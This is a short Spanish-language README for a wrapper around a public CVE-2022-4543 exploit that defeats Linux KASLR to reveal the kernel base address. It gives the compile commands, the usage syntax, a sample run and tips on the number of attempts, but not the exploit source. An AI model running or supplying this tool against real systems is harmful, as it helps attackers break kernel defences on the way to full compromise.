
Envoltorio para el exploit CVE-2022-4543 que desaleatoriza la dirección base del kernel mediante un bypass de KASLR, permitiendo una explotación confiable del kernel en sistemas Linux afectados.
Este es un envoltorio del exploit CVE-2022-4543 de willsroot para ayudarte a determinar y obtener la dirección base del kernel.
Según tu necesidad (Opcional):
gcc dekaslr.c --static -o dekaslr
g++ main.cpp --static -o main
Para algunos SO, instala la libc estática primero.
./main
[*] Usage: ./binary dekaslr_path entry_SYSCALL_64_offset(in hex) max_loop
$ ./main ./dekaslr 0x100000 200
ffffffffa2600000: 53/200
Después de ejecutar ambos programas, obtendrás la dirección más frecuente basada en tu offset.
En la práctica, la dirección base real del kernel aparecerá más de 1/4 del total de intentos. Se recomienda más de 100 intentos.